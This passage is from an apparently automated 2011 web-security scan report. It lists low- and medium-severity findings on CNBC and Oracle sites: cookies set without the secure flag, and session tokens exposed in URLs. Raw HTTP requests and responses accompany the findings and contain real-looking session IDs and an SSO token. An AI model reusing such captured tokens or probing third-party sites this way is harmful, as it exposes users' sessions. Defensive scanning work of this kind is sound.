ETag: "7cf-470db4e522e40"
Accept-Ranges: bytes
Content-Length: 1999
Connection: close
Content-Type: application/x-javascript
Set-Cookie: pers_cookie_insert_cnbc.com_Prod_registration_servers_443=1472320064.23040.0000; expires=Tue, 06-Sep-2011 18:01:37 GMT; path=/

function toggleMessage(show, hide1, hide2){
var showObj = document.getElementById(show);
var hideObj1 = document.getElementById(hide1);
var hideObj2 = document.getElementById(hide2);
hideObj1.
...[SNIP]...

7.63. https://register.cnbc.com/js/registrationValidations.js previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	https://register.cnbc.com
Path:	/js/registrationValidations.js

Issue detail

The following cookie was issued by the application and does not have the secure flag set:

pers_cookie_insert_cnbc.com_Prod_registration_servers_443=834785856.23040.0000; expires=Tue, 06-Sep-2011 18:01:37 GMT; path=/

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /js/registrationValidations.js HTTP/1.1
Host: register.cnbc.com
Connection: keep-alive
Referer: https://register.cnbc.com/registerUser.do?iframe=yes&source=register
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __qca=P0-1380789371-1315338919989; cnbc_regional_cookie=US; s_cc=true; s_nr=1315339139226; s_sq=%5B%5BB%5D%5D; __qseg=Q_D; JSESSIONID=7FFDB885E3232AE9759F6D0A6D01E627

Response

HTTP/1.1 200 OK
Date: Tue, 06 Sep 2011 15:01:37 GMT
Server: Apache/2.2.3 (Unix) mod_ssl/2.2.3 OpenSSL/0.9.7a DAV/2 mod_jk/1.2.19
Last-Modified: Wed, 20 Jan 2010 20:57:35 GMT
ETag: "1dac-47d9ed5f8cdc0"
Accept-Ranges: bytes
Content-Length: 7596
Connection: close
Content-Type: application/x-javascript
Set-Cookie: pers_cookie_insert_cnbc.com_Prod_registration_servers_443=834785856.23040.0000; expires=Tue, 06-Sep-2011 18:01:37 GMT; path=/

//Field Validations - start
var goEmail = true;
var goEmailConf = true;
var goPwd = true;
var goPwdConf = true;
var goSecQstn = true;
var goSecAns = true;
var goScrnNm = true;
var goFrstNm = true;
var
...[SNIP]...

7.64. https://register.cnbc.com/js/s_code.js previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	https://register.cnbc.com
Path:	/js/s_code.js

Issue detail

The following cookie was issued by the application and does not have the secure flag set:

pers_cookie_insert_cnbc.com_Prod_registration_servers_443=834785856.23040.0000; expires=Tue, 06-Sep-2011 18:01:51 GMT; path=/

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /js/s_code.js HTTP/1.1
Host: register.cnbc.com
Connection: keep-alive
Referer: https://register.cnbc.com/forgotPassword.do
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __qca=P0-1380789371-1315338919989; cnbc_regional_cookie=US; __qseg=Q_D; s_cc=true; s_nr=1315339307081; s_sq=nbcuglobal%2C%20nbcucnbcd%2C%20nbcucnbcbu%3D%2526pid%253DSign-in%25257CDefault%25257CSite%252520Sign-in%252520Page%2526pidt%253D1%2526oid%253Dhttp%25253A//register.cnbc.com/forgotpassword1.jsp%2526ot%253DA; JSESSIONID=2468AC9921E8E376640A3CB7840EC38E; TZM=-300

Response

HTTP/1.1 200 OK
Date: Tue, 06 Sep 2011 15:01:51 GMT
Server: Apache/2.2.3 (Unix) mod_ssl/2.2.3 OpenSSL/0.9.7a DAV/2 mod_jk/1.2.19
Last-Modified: Thu, 31 Mar 2011 15:21:14 GMT
ETag: "68d6-49fc8d80f4e80"
Accept-Ranges: bytes
Content-Length: 26838
Connection: close
Content-Type: application/x-javascript
Set-Cookie: pers_cookie_insert_cnbc.com_Prod_registration_servers_443=834785856.23040.0000; expires=Tue, 06-Sep-2011 18:01:51 GMT; path=/

/* SiteCatalyst code version: H.2.
Copyright 1997-2008 Omniture, Inc. More info available at
http://www.omniture.com */
/* Specify the Report Suite ID(s) to track here FEBRUARY 19 2008 UPDATE NBCU CMJ
...[SNIP]...

7.65. https://register.cnbc.com/js/validation.js previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	https://register.cnbc.com
Path:	/js/validation.js

Issue detail

The following cookie was issued by the application and does not have the secure flag set:

pers_cookie_insert_cnbc.com_Prod_registration_servers_443=834785856.23040.0000; expires=Tue, 06-Sep-2011 18:01:37 GMT; path=/

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /js/validation.js HTTP/1.1
Host: register.cnbc.com
Connection: keep-alive
Referer: https://register.cnbc.com/registerUser.do?iframe=yes&source=register
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __qca=P0-1380789371-1315338919989; cnbc_regional_cookie=US; s_cc=true; s_nr=1315339139226; s_sq=%5B%5BB%5D%5D; __qseg=Q_D; JSESSIONID=7FFDB885E3232AE9759F6D0A6D01E627

Response

HTTP/1.1 200 OK
Date: Tue, 06 Sep 2011 15:01:37 GMT
Server: Apache/2.2.3 (Unix) mod_ssl/2.2.3 OpenSSL/0.9.7a DAV/2 mod_jk/1.2.19
Last-Modified: Wed, 29 Jul 2009 18:48:54 GMT
ETag: "184e-46fdca3891180"
Accept-Ranges: bytes
Content-Length: 6222
Connection: close
Content-Type: application/x-javascript
Set-Cookie: pers_cookie_insert_cnbc.com_Prod_registration_servers_443=834785856.23040.0000; expires=Tue, 06-Sep-2011 18:01:37 GMT; path=/

// JavaScript Document
Validation = Class.create();
Validation.prototype = {
initialize: function(parameters, timeout, controls, responsetxt ){
this.parameters = this.generateParameterList(
...[SNIP]...

7.66. https://register.cnbc.com/quote-html-webservice/fvquote.htm previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	https://register.cnbc.com
Path:	/quote-html-webservice/fvquote.htm

Issue detail

The following cookie was issued by the application and does not have the secure flag set:

pers_cookie_insert_cnbc.com_Prod_registration_servers_443=834785856.23040.0000; expires=Tue, 06-Sep-2011 18:05:48 GMT; path=/

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /quote-html-webservice/fvquote.htm HTTP/1.1
Host: register.cnbc.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 404 Not Found
Date: Tue, 06 Sep 2011 15:05:48 GMT
Server: Apache/2.2.3 (Unix) mod_ssl/2.2.3 OpenSSL/0.9.7a DAV/2 mod_jk/1.2.19
Content-Length: 231
Connection: close
Content-Type: text/html; charset=iso-8859-1
Set-Cookie: pers_cookie_insert_cnbc.com_Prod_registration_servers_443=834785856.23040.0000; expires=Tue, 06-Sep-2011 18:05:48 GMT; path=/

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>404 Not Found</title>
</head><body>
<h1>Not Found</h1>
<p>The requested URL /quote-html-webservice/fvquote.htm was not found on t
...[SNIP]...

7.67. https://register.cnbc.com/quote-html-webservice/quote.htm previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	https://register.cnbc.com
Path:	/quote-html-webservice/quote.htm

Issue detail

The following cookie was issued by the application and does not have the secure flag set:

pers_cookie_insert_cnbc.com_Prod_registration_servers_443=834785856.23040.0000; expires=Tue, 06-Sep-2011 18:05:48 GMT; path=/

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /quote-html-webservice/quote.htm HTTP/1.1
Host: register.cnbc.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 404 Not Found
Date: Tue, 06 Sep 2011 15:05:48 GMT
Server: Apache/2.2.3 (Unix) mod_ssl/2.2.3 OpenSSL/0.9.7a DAV/2 mod_jk/1.2.19
Content-Length: 229
Connection: close
Content-Type: text/html; charset=iso-8859-1
Set-Cookie: pers_cookie_insert_cnbc.com_Prod_registration_servers_443=834785856.23040.0000; expires=Tue, 06-Sep-2011 18:05:48 GMT; path=/

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>404 Not Found</title>
</head><body>
<h1>Not Found</h1>
<p>The requested URL /quote-html-webservice/quote.htm was not found on thi
...[SNIP]...

7.68. https://register.cnbc.com/refreshlogin.jsp previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	https://register.cnbc.com
Path:	/refreshlogin.jsp

Issue detail

The following cookie was issued by the application and does not have the secure flag set:

pers_cookie_insert_cnbc.com_Prod_registration_servers_443=834785856.23040.0000; expires=Tue, 06-Sep-2011 18:03:06 GMT; path=/

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /refreshlogin.jsp?source=header&service=http://www.cnbc.com/ HTTP/1.1
Host: register.cnbc.com
Connection: keep-alive
Referer: http://www.cnbc.com/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __qca=P0-1380789371-1315338919989; TZM=-300; JSESSIONID=30F7657E561A5A03E5B11ABE0843E7D5; s_cc=true; __qseg=Q_D; s_nr=1315339382427; s_sq=nbcuglobal%2C%20nbcucnbcd%2C%20nbcucnbcbu%3D%2526pid%253DFront%25257CHome%25257Chomeus%25257C15839285%25257CStock%252520Market%252520News%25252C%252520Business%252520News%25252C%252520Financial%25252C%252520Earni%2526pidt%253D1%2526oid%253Dhttp%25253A//www.cnbc.com/%252523%2526ot%253DA; cnbc_regional_cookie=US

Response

HTTP/1.1 302 Moved Temporarily
Date: Tue, 06 Sep 2011 15:03:06 GMT
Server: Apache/2.2.3 (Unix) mod_ssl/2.2.3 OpenSSL/0.9.7a DAV/2 mod_jk/1.2.19
Location: https://login.cnbc.com/cas/login?service=https%3A%2F%2Fregister.cnbc.com%2Fj_acegi_cas_security_check&source=header&login_view=header
Content-Length: 0
Connection: close
Content-Type: text/plain
Set-Cookie: pers_cookie_insert_cnbc.com_Prod_registration_servers_443=834785856.23040.0000; expires=Tue, 06-Sep-2011 18:03:06 GMT; path=/

8. Session token in URL previous next
There are 42 instances of this issue:

http://blogs.oracle.com/roller-ui/cwpLogin.jsp
https://forums.oracle.com/forums/category.jspa
https://forums.oracle.com/forums/main.jspa
https://forums.oracle.com/forums/style/style.jsp
https://forums.oracle.com/forums/themes/english/resources/feed-icon-14x14.jpg
https://forums.oracle.com/forums/themes/english/resources/info_company.gif
https://forums.oracle.com/forums/themes/english/resources/oralogo_small.gif
https://forums.oracle.com/forums/themes/english/resources/otn_new.css
https://forums.oracle.com/forums/themes/english/resources/s_code.js
https://forums.oracle.com/forums/themes/english/resources/s_code_forums.js
https://forums.oracle.com/forums/themes/english/resources/spacer.gif
https://forums.oracle.com/forums/themes/english/resources/style.css
http://l.sharethis.com/pview
https://login.cnbc.com/cas/login
https://login.oracle.com/pls/orasso/orasso.wwsso_app_admin.ls_login
https://myprofile.oracle.com/EndUser/adf/images/sibusy.gif
https://myprofile.oracle.com/EndUser/adf/images/siready.gif
https://myprofile.oracle.com/EndUser/adf/images/t.gif
https://myprofile.oracle.com/EndUser/adf/jsLibs/Common1_2_12_1.js
https://myprofile.oracle.com/EndUser/adf/styles/cache/profile-desktop-6nkike-en-ltr-webkit-cmp.css
https://myprofile.oracle.com/EndUser/images/fading-background.png
https://myprofile.oracle.com/EndUser/images/logo-oracle-red.png
https://myprofile.oracle.com/EndUser/jscripts/s_code.js
https://myprofile.oracle.com/EndUser/jscripts/s_code_popup.js
https://myprofile.oracle.com/EndUser/jscripts/s_code_profile.js
https://myprofile.oracle.com/EndUser/jscripts/s_validation.js
http://netsuite.tt.omtrdc.net/m2/netsuite/mbox/standard
http://www.apture.com/js/apture.js
http://www.atg.com/
http://www.atg.com/en/solutions/
http://www.atg.com/service/main.jsp
http://www.atg.com/service/main.jsp
https://www.atg.com/en/customers/listing/
https://www.atg.com/en/password/request/
https://www.atg.com/en/register/
https://www.atg.com/service/main.jsp
http://www.facebook.com/extern/login_status.php
http://www.google.com/search
http://www.oracle.com/us/technologies/virtualization/index.html
http://www.oracle.com/webapps/dialogue/dlgpage.jsp
http://www.readwriteweb.com/%22http://rww.readwriteweb.netdna-cdn.com/assets_c/2009/06/oralogo_june09-thumb-150x20-5948.gif/%22
http://www.readwriteweb.com/404.html

Issue background

Sensitive information within URLs may be logged in various locations, including the user's browser, the web server, and any forward or reverse proxy servers between the two endpoints. URLs may also be displayed on-screen, bookmarked or emailed around by users. They may be disclosed to third parties via the Referer header when any off-site links are followed. Placing session tokens into the URL increases the risk that they will be captured by an attacker.

Issue remediation

The application should use an alternative mechanism for transmitting session tokens, such as HTTP cookies or hidden fields in forms that are submitted using the POST method.

8.1. http://blogs.oracle.com/roller-ui/cwpLogin.jsp previous next

Summary

Severity:	Medium
Confidence:	Firm
Host:	http://blogs.oracle.com
Path:	/roller-ui/cwpLogin.jsp

Issue detail

The response contains the following links that appear to contain session tokens:

https://login.oracle.com/pls/orasso/orasso.wwsso_app_admin.ls_login?Site2pstoreToken=v1.2~15AB5291~CA7268AF16FDDCD6192ED08700B7C3B3CA2E1B23878BCD93247A950FAAA266F9D7A7C11B2586EEC1681E7C0613B1F158706D3CA7C179F2B6A77573D5C53030D02597238CD1C3E0212AE912A5703E640DF935186B51AB3DFAEEE7B2A7E20FF4542015DBB0457891C5A4461CB4B4A23EB51909CE24B245C0A7CB1A8EBE5AC1C84D4342665B366BF177D22BAC7C46B7421C202F9871EF6C385B9C84ABA7DAB0DE4470E2A9204FA9C682

Request

GET /roller-ui/cwpLogin.jsp HTTP/1.1
Host: blogs.oracle.com
Proxy-Connection: keep-alive
Referer: http://blogs.oracle.com/otn/entry/bea_welcome_and_oracles_middle
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: s_wgw_lv=1315343380912; s_wgw_lv_s=First%20Visit; s_nr6=1315343380933-New; JSESSIONID=N62MTmHFyVjP3vlZCyTSrpWsKDhTVl78pvQh5p14CnPctL0GvTWg!682060306; s_pers=%20s_nr%3D1315343775191%7C1317935775191%3B%20gpv_p24%3Dno%2520value%7C1315345575196%3B%20gpw_e24%3Dno%2520value%7C1315345575201%3B; s_sess=%20s_cc%3Dtrue%3B%20s_sq%3Doracleotnlive%253D%252526pid%25253Dotn%2525253Aen-us%2525253A%2525252Fcommunity%2525252Fdeveloper-vm%2525252F%252526pidt%25253D1%252526oid%25253Dotn%2525253Aen%2525253Ahnav%2525253Astore%2525253Astoredatabase%2525253Astoredatabaseseeall%252526oidt%25253D1%252526ot%25253DA%252526oi%25253D1%3B; s_nr=1315343778351; gpw_e24=http%3A%2F%2Fblogs.oracle.com%2Fotn%2Fentry%2Fbea_welcome_and_oracles_middle; s_sq=oracleblogs%2Coracleglobal%3D%2526pid%253Dblogs%25253Aen-us%25253A%25252Fotn%25252Fentry%25252Fbea_welcome_and_oracles_middle%2526pidt%253D1%2526oid%253Dhttp%25253A%25252F%25252Fblogs.oracle.com%25252Froller-ui%25252Flogin-redirect.rol%2526ot%253DA

Response

HTTP/1.1 302 Moved Temporarily
Location: https://login.oracle.com/pls/orasso/orasso.wwsso_app_admin.ls_login?Site2pstoreToken=v1.2~15AB5291~CA7268AF16FDDCD6192ED08700B7C3B3CA2E1B23878BCD93247A950FAAA266F9D7A7C11B2586EEC1681E7C0613B1F158706D3CA7C179F2B6A77573D5C53030D02597238CD1C3E0212AE912A5703E640DF935186B51AB3DFAEEE7B2A7E20FF4542015DBB0457891C5A4461CB4B4A23EB51909CE24B245C0A7CB1A8EBE5AC1C84D4342665B366BF177D22BAC7C46B7421C202F9871EF6C385B9C84ABA7DAB0DE4470E2A9204FA9C682
X-Robots-Tag: noindex,follow
X-Powered-By: Servlet/2.5 JSP/2.1
Content-Type: text/html; charset=UTF-8
Content-Language: en
X-Oracle-DMS-ECID: 51624319760812530
Server: Oracle-Application-Server-11g Oracle-Web-Cache-11g/11.1.1.3.0 (N;ecid=51624319760812530,0:1)
Content-Length: 1065
Vary: Accept-Encoding
Date: Tue, 06 Sep 2011 16:16:18 GMT
Connection: close
Set-Cookie: OHS-blogs.oracle.com=; path=/

<html><head><title>302 Moved Temporarily</title></head>
<body bgcolor="#FFFFFF">
<p>This document you requested has moved temporarily.</p>
<p>It's now at <a href="https://login.oracle.com/pls/orasso/orasso.wwsso_app_admin.ls_login?Site2pstoreToken=v1.2~15AB5291~CA7268AF16FDDCD6192ED08700B7C3B3CA2E1B23878BCD93247A950FAAA266F9D7A7C11B2586EEC1681E7C0613B1F158706D3CA7C179F2B6A77573D5C53030D02597238CD1C3E0212AE912A5703E640DF935186B51AB3DFAEEE7B2A7E20FF4542015DBB0457891C5A4461CB4B4A23EB51909CE24B245C0A7CB1A8EBE5AC1C84D4342665B366BF177D22BAC7C46B7421C202F9871EF6C385B9C84ABA7DAB0DE4470E2A9204FA9C682">https://login.oracle.com/pls/orasso/orasso.wwsso_app_admin.ls_login?Site2pstoreToken=v1.2~15AB5291~CA7268AF16FDDCD6192ED08700B7C3B3CA2E1B23878BCD93247A950FAAA266F9D7A7C11B2586EEC1681E7C0613B1F158706D3C
...[SNIP]...

8.2. https://forums.oracle.com/forums/category.jspa previous next

Summary

Severity:	Medium
Confidence:	Firm
Host:	https://forums.oracle.com
Path:	/forums/category.jspa

Issue detail

The response contains the following links that appear to contain session tokens:

https://forums.oracle.com/forums/category.jspa;jsessionid=8d92100c30d79523dd6a08ba471990bd96230d1d2b81.e34SbxmSbNyKai0Lc3mPbhmSb38Re0?categoryID=18
https://forums.oracle.com/forums/guestsettings!default.jspa;jsessionid=8d92100c30d79523dd6a08ba471990bd96230d1d2b81.e34SbxmSbNyKai0Lc3mPbhmSb38Re0
https://forums.oracle.com/forums/help.jspa;jsessionid=8d92100c30d79523dd6a08ba471990bd96230d1d2b81.e34SbxmSbNyKai0Lc3mPbhmSb38Re0
https://forums.oracle.com/forums/index.jspa;jsessionid=8d92100c30d79523dd6a08ba471990bd96230d1d2b81.e34SbxmSbNyKai0Lc3mPbhmSb38Re0?categoryID=84
https://forums.oracle.com/forums/login!withRedirect.jspa;jsessionid=8d92100c30d79523dd6a08ba471990bd96230d1d2b81.e34SbxmSbNyKai0Lc3mPbhmSb38Re0
https://forums.oracle.com/forums/search!default.jspa;jsessionid=8d92100c30d79523dd6a08ba471990bd96230d1d2b81.e34SbxmSbNyKai0Lc3mPbhmSb38Re0
https://forums.oracle.com/forums/style/style.jsp;jsessionid=8d92100c30d79523dd6a08ba471990bd96230d1d2b81.e34SbxmSbNyKai0Lc3mPbhmSb38Re0
https://forums.oracle.com/forums/tags/;jsessionid=8d92100c30d79523dd6a08ba471990bd96230d1d2b81.e34SbxmSbNyKai0Lc3mPbhmSb38Re010g?categoryID=18
https://forums.oracle.com/forums/tags/;jsessionid=8d92100c30d79523dd6a08ba471990bd96230d1d2b81.e34SbxmSbNyKai0Lc3mPbhmSb38Re011g?categoryID=18
https://forums.oracle.com/forums/tags/;jsessionid=8d92100c30d79523dd6a08ba471990bd96230d1d2b81.e34SbxmSbNyKai0Lc3mPbhmSb38Re09i?categoryID=18
https://forums.oracle.com/forums/tags/;jsessionid=8d92100c30d79523dd6a08ba471990bd96230d1d2b81.e34SbxmSbNyKai0Lc3mPbhmSb38Re0apex?categoryID=18
https://forums.oracle.com/forums/tags/;jsessionid=8d92100c30d79523dd6a08ba471990bd96230d1d2b81.e34SbxmSbNyKai0Lc3mPbhmSb38Re0database?categoryID=18
https://forums.oracle.com/forums/tags/;jsessionid=8d92100c30d79523dd6a08ba471990bd96230d1d2b81.e34SbxmSbNyKai0Lc3mPbhmSb38Re0dba?categoryID=18
https://forums.oracle.com/forums/tags/;jsessionid=8d92100c30d79523dd6a08ba471990bd96230d1d2b81.e34SbxmSbNyKai0Lc3mPbhmSb38Re0error?categoryID=18
https://forums.oracle.com/forums/tags/;jsessionid=8d92100c30d79523dd6a08ba471990bd96230d1d2b81.e34SbxmSbNyKai0Lc3mPbhmSb38Re0installation?categoryID=18
https://forums.oracle.com/forums/tags/;jsessionid=8d92100c30d79523dd6a08ba471990bd96230d1d2b81.e34SbxmSbNyKai0Lc3mPbhmSb38Re0oracle?categoryID=18
https://forums.oracle.com/forums/tags/;jsessionid=8d92100c30d79523dd6a08ba471990bd96230d1d2b81.e34SbxmSbNyKai0Lc3mPbhmSb38Re0performance?categoryID=18
https://forums.oracle.com/forums/tags/;jsessionid=8d92100c30d79523dd6a08ba471990bd96230d1d2b81.e34SbxmSbNyKai0Lc3mPbhmSb38Re0pl_sql?categoryID=18
https://forums.oracle.com/forums/tags/;jsessionid=8d92100c30d79523dd6a08ba471990bd96230d1d2b81.e34SbxmSbNyKai0Lc3mPbhmSb38Re0plsql?categoryID=18
https://forums.oracle.com/forums/tags/;jsessionid=8d92100c30d79523dd6a08ba471990bd96230d1d2b81.e34SbxmSbNyKai0Lc3mPbhmSb38Re0report?categoryID=18
https://forums.oracle.com/forums/tags/;jsessionid=8d92100c30d79523dd6a08ba471990bd96230d1d2b81.e34SbxmSbNyKai0Lc3mPbhmSb38Re0rman?categoryID=18
https://forums.oracle.com/forums/tags/;jsessionid=8d92100c30d79523dd6a08ba471990bd96230d1d2b81.e34SbxmSbNyKai0Lc3mPbhmSb38Re0sql?categoryID=18
https://forums.oracle.com/forums/tags;jsessionid=8d92100c30d79523dd6a08ba471990bd96230d1d2b81.e34SbxmSbNyKai0Lc3mPbhmSb38Re0?categoryID=18
https://forums.oracle.com/forums/themes/english/resources/feed-icon-14x14.jpg;jsessionid=8d92100c30d79523dd6a08ba471990bd96230d1d2b81.e34SbxmSbNyKai0Lc3mPbhmSb38Re0
https://forums.oracle.com/forums/themes/english/resources/info_company.gif;jsessionid=8d92100c30d79523dd6a08ba471990bd96230d1d2b81.e34SbxmSbNyKai0Lc3mPbhmSb38Re0
https://forums.oracle.com/forums/themes/english/resources/oralogo_small.gif;jsessionid=8d92100c30d79523dd6a08ba471990bd96230d1d2b81.e34SbxmSbNyKai0Lc3mPbhmSb38Re0
https://forums.oracle.com/forums/themes/english/resources/otn_new.css;jsessionid=8d92100c30d79523dd6a08ba471990bd96230d1d2b81.e34SbxmSbNyKai0Lc3mPbhmSb38Re0
https://forums.oracle.com/forums/themes/english/resources/s_code.js;jsessionid=8d92100c30d79523dd6a08ba471990bd96230d1d2b81.e34SbxmSbNyKai0Lc3mPbhmSb38Re0?a=b
https://forums.oracle.com/forums/themes/english/resources/s_code_forums.js;jsessionid=8d92100c30d79523dd6a08ba471990bd96230d1d2b81.e34SbxmSbNyKai0Lc3mPbhmSb38Re0?a=b
https://forums.oracle.com/forums/themes/english/resources/spacer.gif;jsessionid=8d92100c30d79523dd6a08ba471990bd96230d1d2b81.e34SbxmSbNyKai0Lc3mPbhmSb38Re0
https://forums.oracle.com/forums/themes/english/resources/style.css;jsessionid=8d92100c30d79523dd6a08ba471990bd96230d1d2b81.e34SbxmSbNyKai0Lc3mPbhmSb38Re0

Request

Response

HTTP/1.1 200 OK
Server: Oracle-Application-Server-10g
Content-Language: en-US
Content-Type: text/html; charset=UTF-8
Content-Length: 123998
Date: Tue, 06 Sep 2011 16:13:12 GMT
Connection: keep-alive
Vary: Accept-Encoding
Set-Cookie: JSESSIONID=8d92100c30d79523dd6a08ba471990bd96230d1d2b81.e34SbxmSbNyKai0Lc3mPbhmSb38Re0; path=/forums
Set-Cookie: BIGipServerforums_prod_pool=202412685.20480.0000; path=/

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.0 Transitional//EN">
<html>

<head>

<title>OTN Discussion Forums : Database</title>
<meta http-equiv="content-type" content="text/html; charset=UTF-8">
<link rel="stylesheet" type="text/css" href="/forums/style/style.jsp;jsessionid=8d92100c30d79523dd6a08ba471990bd96230d1d2b81.e34SbxmSbNyKai0Lc3mPbhmSb38Re0" />
<link rel="stylesheet" type="text/css" href="/forums/themes/english/resources/style.css;jsessionid=8d92100c30d79523dd6a08ba471990bd96230d1d2b81.e34SbxmSbNyKai0Lc3mPbhmSb38Re0" />
<link rel="stylesheet" type="text/css" href="/forums/themes/english/resources/otn_new.css;jsessionid=8d92100c30d79523dd6a08ba471990bd96230d1d2b81.e34SbxmSbNyKai0Lc3mPbhmSb38Re0" />
<link rel="alternate" type="application/rss+xml" title="RSS"
href="http://forums.oracle.com/forums/rss/rssmessages.jspa?categoryID=18">
...[SNIP]...
<A HREF="http://www.oracle.com/technology/index.html"><IMG SRC="/forums/themes/english/resources/oralogo_small.gif;jsessionid=8d92100c30d79523dd6a08ba471990bd96230d1d2b81.e34SbxmSbNyKai0Lc3mPbhmSb38Re0" hspace="10" BORDER=0 ALT="Forums.Oracle.com"></a>
...[SNIP]...
<br><IMG alt="" src="/forums/themes/english/resources/spacer.gif;jsessionid=8d92100c30d79523dd6a08ba471990bd96230d1d2b81.e34SbxmSbNyKai0Lc3mPbhmSb38Re0" width=1 height=8 border=0></td>
...[SNIP]...
<em>

<a href="/forums/index.jspa;jsessionid=8d92100c30d79523dd6a08ba471990bd96230d1d2b81.e34SbxmSbNyKai0Lc3mPbhmSb38Re0?categoryID=84">Forum Home</a>

»
<a href="/forums/category.jspa;jsessionid=8d92100c30d79523dd6a08ba471990bd96230d1d2b81.e34SbxmSbNyKai0Lc3mPbhmSb38Re0?categoryID=18">Database</a>
...[SNIP]...
<td class="jive-acc-login">

<a href="/forums/login!withRedirect.jspa;jsessionid=8d92100c30d79523dd6a08ba471990bd96230d1d2b81.e34SbxmSbNyKai0Lc3mPbhmSb38Re0">
Sign In</a>
...[SNIP]...
<td class="jive-acc-cp"><a href="/forums/guestsettings!default.jspa;jsessionid=8d92100c30d79523dd6a08ba471990bd96230d1d2b81.e34SbxmSbNyKai0Lc3mPbhmSb38Re0">Guest Settings</a>
...[SNIP]...
<td class="jive-acc-search"><a href="/forums/search!default.jspa;jsessionid=8d92100c30d79523dd6a08ba471990bd96230d1d2b81.e34SbxmSbNyKai0Lc3mPbhmSb38Re0" title="Search">Search</a>
...[SNIP]...
<td class="jive-acc-help"><a href="/forums/help.jspa;jsessionid=8d92100c30d79523dd6a08ba471990bd96230d1d2b81.e34SbxmSbNyKai0Lc3mPbhmSb38Re0" title="FAQ" target="_blank">FAQ</a>
...[SNIP]...
<li class="jive-tagset-popularity8" >
<a href = "/forums/tags/;jsessionid=8d92100c30d79523dd6a08ba471990bd96230d1d2b81.e34SbxmSbNyKai0Lc3mPbhmSb38Re010g?categoryID=18"
title = "Used 7977 times" >10g</a >
...[SNIP]...
<li class="jive-tagset-popularity3" >
<a href = "/forums/tags/;jsessionid=8d92100c30d79523dd6a08ba471990bd96230d1d2b81.e34SbxmSbNyKai0Lc3mPbhmSb38Re011g?categoryID=18"
title = "Used 4147 times" >11g</a >
...[SNIP]...
<li class="jive-tagset-popularity0" >
<a href = "/forums/tags/;jsessionid=8d92100c30d79523dd6a08ba471990bd96230d1d2b81.e34SbxmSbNyKai0Lc3mPbhmSb38Re09i?categoryID=18"
title = "Used 1253 times" >9i</a >
...[SNIP]...
<li class="jive-tagset-popularity9" >
<a href = "/forums/tags/;jsessionid=8d92100c30d79523dd6a08ba471990bd96230d1d2b81.e34SbxmSbNyKai0Lc3mPbhmSb38Re0apex?categoryID=18"
title = "Used 9640 times" >apex</a >
...[SNIP]...
<li class="jive-tagset-popularity3" >
<a href = "/forums/tags/;jsessionid=8d92100c30d79523dd6a08ba471990bd96230d1d2b81.e34SbxmSbNyKai0Lc3mPbhmSb38Re0database?categoryID=18"
title = "Used 3705 times" >database</a >
...[SNIP]...
<li class="jive-tagset-popularity0" >
<a href = "/forums/tags/;jsessionid=8d92100c30d79523dd6a08ba471990bd96230d1d2b81.e34SbxmSbNyKai0Lc3mPbhmSb38Re0dba?categoryID=18"
title = "Used 1155 times" >dba</a >
...[SNIP]...
<li class="jive-tagset-popularity0" >
<a href = "/forums/tags/;jsessionid=8d92100c30d79523dd6a08ba471990bd96230d1d2b81.e34SbxmSbNyKai0Lc3mPbhmSb38Re0error?categoryID=18"
title = "Used 1587 times" >error</a >
...[SNIP]...
<li class="jive-tagset-popularity0" >
<a href = "/forums/tags/;jsessionid=8d92100c30d79523dd6a08ba471990bd96230d1d2b81.e34SbxmSbNyKai0Lc3mPbhmSb38Re0installation?categoryID=18"
title = "Used 1112 times" >installation</a >
